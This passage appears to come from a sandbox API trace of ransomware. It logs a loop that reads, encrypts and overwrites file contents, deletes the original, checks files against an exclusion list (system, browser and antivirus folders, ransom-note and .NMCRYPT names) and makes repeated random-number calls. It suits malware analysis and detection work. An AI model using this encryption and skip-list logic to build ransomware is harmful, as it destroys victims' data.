lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.158] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.158] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.158] GetLastError () returned 0x0 [0168.158] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.158] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.158] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.158] GetLastError () returned 0x0 [0168.158] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.158] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.158] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.158] GetLastError () returned 0x0 [0168.158] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.158] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.158] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.158] GetLastError () returned 0x0 [0168.158] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.158] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.158] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.158] GetLastError () returned 0x0 [0168.158] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.158] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.158] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.158] GetLastError () returned 0x0 [0168.158] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.159] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.159] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x110) returned 1 [0168.159] GetLastError () returned 0x0 [0168.159] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x110, lpOverlapped=0x0) returned 1 [0168.159] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0168.159] WriteFile (in: hFile=0x15c4, lpBuffer=0x2882928*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0168.159] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb")) returned 0x20 [0168.159] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb", dwFileAttributes=0x20) returned 0 [0168.159] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb") returned 1 [0168.159] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb")) returned 0 [0168.160] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" [0168.160] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado") returned 1 [0168.160] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX46C.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx46c.tmp")) returned 0x46c [0168.160] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX46C.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx46c.tmp"), dwFlags=0x1) returned 0 [0168.160] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX46C.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx46c.tmp")) returned 1 [0168.161] CryptDestroyKey (hKey=0x9ad138) returned 1 [0168.161] wcslen (_String="OK") returned 0x2 [0168.161] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.161] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.161] CryptDestroyKey (hKey=0x9ad338) returned 1 [0168.161] CryptDestroyHash (hHash=0x9ad778) returned 1 [0168.161] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0168.161] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.161] PathMatchSpecW (pszFile="msador15.dll", pszSpec="*NMCRYPT") returned 0 [0168.161] PathMatchSpecW (pszFile="msador15.dll", pszSpec="*Recovers your files.html") returned 0 [0168.161] PathMatchSpecW (pszFile="msador15.dll", pszSpec="*.exe") returned 0 [0168.161] PathMatchSpecW (pszFile="msador15.dll", pszSpec="*.dll") returned 1 [0168.161] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*NMCRYPT") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*Recovers your files.html") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*.exe") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*.dll") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*.lnk") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*.bat") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*.ini") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*.msi") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*.scf") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*pagefile.sys*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*NTUSER.DAT*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*AppData*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*\\winrar\\*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*\\Internet Explorer\\*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*\\java\\*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*\\TeamViewer\\*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*\\windows\\*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*\\ESET\\*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*\\AVG\\*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*\\AVIRA\\*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*\\AVAST Software\\*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*Atheros*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*Realtek*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*bootmgr*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*boot*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*boot*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*CONFIG.SYS*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*IO.SYS*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*MSDOS.SYS*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*NTDETECT.COM*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*ntldr*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*chrome*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*opera*") returned 0 [0168.161] PathMatchSpecW (pszFile="msador28.tlb", pszSpec="*firefox*") returned 0 [0168.162] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb", pszSpec="*") returned 1 [0168.162] strlen (_Str="NMoreira") returned 0x8 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.162] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.163] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.164] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 